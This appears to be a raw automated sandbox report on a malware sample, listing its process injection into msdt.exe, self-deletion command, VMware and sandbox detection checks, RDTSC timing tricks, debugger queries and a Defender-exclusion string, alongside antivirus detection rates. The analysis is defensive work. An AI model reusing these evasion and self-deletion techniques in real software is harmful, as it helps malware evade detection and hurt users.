          Source: DNPr7t0GMY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: DNPr7t0GMY.exeVirustotal: Detection: 55%
          Source: DNPr7t0GMY.exeMetadefender: Detection: 34%
          Source: DNPr7t0GMY.exeReversingLabs: Detection: 60%
          Source: unknownProcess created: C:\Users\user\Desktop\DNPr7t0GMY.exe 'C:\Users\user\Desktop\DNPr7t0GMY.exe'
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess created: C:\Users\user\Desktop\DNPr7t0GMY.exe C:\Users\user\Desktop\DNPr7t0GMY.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DNPr7t0GMY.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess created: C:\Users\user\Desktop\DNPr7t0GMY.exe C:\Users\user\Desktop\DNPr7t0GMY.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DNPr7t0GMY.exe'Jump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: DNPr7t0GMY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: DNPr7t0GMY.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: DNPr7t0GMY.exeStatic file information: File size 1325568 > 1048576
          Source: DNPr7t0GMY.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x142e00
          Source: DNPr7t0GMY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: DNPr7t0GMY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msdt.pdbGCTL source: DNPr7t0GMY.exe, 00000004.00000002.272130410.0000000002D50000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: DNPr7t0GMY.exe, 00000004.00000002.271750109.000000000113F000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DNPr7t0GMY.exe, 00000004.00000002.271750109.000000000113F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\jrFIryXeZK\src\obj\Debug\AppDomainTimerSafeHandle.pdb source: DNPr7t0GMY.exe
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\jrFIryXeZK\src\obj\Debug\AppDomainTimerSafeHandle.pdb,L source: DNPr7t0GMY.exe
          Source: Binary string: msdt.pdb source: DNPr7t0GMY.exe, 00000004.00000002.272130410.0000000002D50000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B2A2 push cs; ret 4_2_0041B2A3
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B3F2 push eax; ret 4_2_0041B3F8
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B3FB push eax; ret 4_2_0041B462
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B3A5 push eax; ret 4_2_0041B3F8
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B45C push eax; ret 4_2_0041B462
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00415414 push esp; ret 4_2_00415416
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00414F46 push cs; ret 4_2_00414F47
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041BF12 push dword ptr [8427D5C5h]; ret 4_2_0041C1FF
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00415FC5 push ebp; ret 4_2_00415FC6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D2D0D1 push ecx; ret 10_2_04D2D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B2A2 push cs; ret 10_2_0079B2A3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B3FB push eax; ret 10_2_0079B462
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B3F2 push eax; ret 10_2_0079B3F8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B3A5 push eax; ret 10_2_0079B3F8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B45C push eax; ret 10_2_0079B462
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00795414 push esp; ret 10_2_00795416
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00794F46 push cs; ret 10_2_00794F47
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079BF12 push dword ptr [8427D5C5h]; ret 10_2_0079C1FF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00795FC5 push ebp; ret 10_2_00795FC6
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: DNPr7t0GMY.exe PID: 6428, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000007885E4 second address: 00000000007885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 000000000078896E second address: 0000000000788974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_004088A0 rdtsc 4_2_004088A0
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exe TID: 6432Thread sleep time: -104955s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exe TID: 6476Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4968Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeThread delayed: delay time: 104955Jump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000005.00000000.238628073.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.238628073.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.238425527.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.237897554.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.232822320.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000005.00000000.238628073.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.238628073.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.238741130.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000000.232851476.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.237897554.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.237897554.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000005.00000000.238628073.000000000871F000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAJ
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: msdt.exe, 0000000A.00000002.478405573.0000000000D31000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 00000005.00000000.237897554.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_004088A0 rdtsc 4_2_004088A0
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00409B10 LdrLoadDll,4_2_00409B10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA8CD6 mov eax, dword ptr fs:[00000030h]10_2_04DA8CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D914FB mov eax, dword ptr fs:[00000030h]10_2_04D914FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56CF0 mov eax, dword ptr fs:[00000030h]10_2_04D56CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56CF0 mov eax, dword ptr fs:[00000030h]10_2_04D56CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56CF0 mov eax, dword ptr fs:[00000030h]10_2_04D56CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE849B mov eax, dword ptr fs:[00000030h]10_2_04CE849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6C450 mov eax, dword ptr fs:[00000030h]10_2_04D6C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6C450 mov eax, dword ptr fs:[00000030h]10_2_04D6C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0A44B mov eax, dword ptr fs:[00000030h]10_2_04D0A44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF746D mov eax, dword ptr fs:[00000030h]10_2_04CF746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA740D mov eax, dword ptr fs:[00000030h]10_2_04DA740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA740D mov eax, dword ptr fs:[00000030h]10_2_04DA740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA740D mov eax, dword ptr fs:[00000030h]10_2_04DA740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]10_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56C0A mov eax, dword ptr fs:[00000030h]10_2_04D56C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56C0A mov eax, dword ptr fs:[00000030h]10_2_04D56C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56C0A mov eax, dword ptr fs:[00000030h]10_2_04D56C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56C0A mov eax, dword ptr fs:[00000030h]10_2_04D56C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0BC2C mov eax, dword ptr fs:[00000030h]10_2_04D0BC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56DC9 mov eax, dword ptr fs:[00000030h]10_2_04D56DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56DC9 mov eax, dword ptr fs:[00000030h]10_2_04D56DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56DC9 mov eax, dword ptr fs:[00000030h]10_2_04D56DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56DC9 mov ecx, dword ptr fs:[00000030h]10_2_04D56DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56DC9 mov eax, dword ptr fs:[00000030h]10_2_04D56DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56DC9 mov eax, dword ptr fs:[00000030h]10_2_04D56DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D88DF1 mov eax, dword ptr fs:[00000030h]10_2_04D88DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CED5E0 mov eax, dword ptr fs:[00000030h]10_2_04CED5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CED5E0 mov eax, dword ptr fs:[00000030h]10_2_04CED5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]10_2_04D9FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]10_2_04D9FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]10_2_04D9FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]10_2_04D9FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD2D8A mov eax, dword ptr fs:[00000030h]10_2_04CD2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD2D8A mov eax, dword ptr fs:[00000030h]10_2_04CD2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD2D8A mov eax, dword ptr fs:[00000030h]10_2_04CD2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD2D8A mov eax, dword ptr fs:[00000030h]10_2_04CD2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD2D8A mov eax, dword ptr fs:[00000030h]10_2_04CD2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0FD9B mov eax, dword ptr fs:[00000030h]10_2_04D0FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0FD9B mov eax, dword ptr fs:[00000030h]10_2_04D0FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02581 mov eax, dword ptr fs:[00000030h]10_2_04D02581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02581 mov eax, dword ptr fs:[00000030h]10_2_04D02581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02581 mov eax, dword ptr fs:[00000030h]10_2_04D02581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02581 mov eax, dword ptr fs:[00000030h]10_2_04D02581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D01DB5 mov eax, dword ptr fs:[00000030h]10_2_04D01DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D01DB5 mov eax, dword ptr fs:[00000030h]10_2_04D01DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D01DB5 mov eax, dword ptr fs:[00000030h]10_2_04D01DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D035A1 mov eax, dword ptr fs:[00000030h]10_2_04D035A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA05AC mov eax, dword ptr fs:[00000030h]10_2_04DA05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA05AC mov eax, dword ptr fs:[00000030h]10_2_04DA05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D13D43 mov eax, dword ptr fs:[00000030h]10_2_04D13D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D53540 mov eax, dword ptr fs:[00000030h]10_2_04D53540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF7D50 mov eax, dword ptr fs:[00000030h]10_2_04CF7D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFC577 mov eax, dword ptr fs:[00000030h]10_2_04CFC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFC577 mov eax, dword ptr fs:[00000030h]10_2_04CFC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9E539 mov eax, dword ptr fs:[00000030h]10_2_04D9E539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D5A537 mov eax, dword ptr fs:[00000030h]10_2_04D5A537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D04D3B mov eax, dword ptr fs:[00000030h]10_2_04D04D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D04D3B mov eax, dword ptr fs:[00000030h]10_2_04D04D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D04D3B mov eax, dword ptr fs:[00000030h]10_2_04D04D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA8D34 mov eax, dword ptr fs:[00000030h]10_2_04DA8D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]10_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]10_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]10_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]10_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]10_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]10_2_04CE3D34
